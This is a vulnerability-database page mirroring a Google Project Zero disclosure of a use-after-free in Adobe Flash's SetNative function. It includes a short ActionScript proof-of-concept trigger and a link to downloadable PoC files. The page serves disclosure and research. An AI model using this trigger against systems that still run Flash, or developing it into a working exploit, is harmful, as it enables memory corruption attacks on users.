Lucene search
K

Adobe Flash - SetNative Use-After-Free

🗓️ 17 May 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 41 Views

Adobe Flash - SetNative Use-After-Free vulnerability in SetNative functio

Related
Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=800
 
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:
 
var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);
ASSetNative(t, 106, "a,b");
             
             
function func (){
     
    t.removeMovieClip();
     
    }
 
A swf and fla are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39831.zip

#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation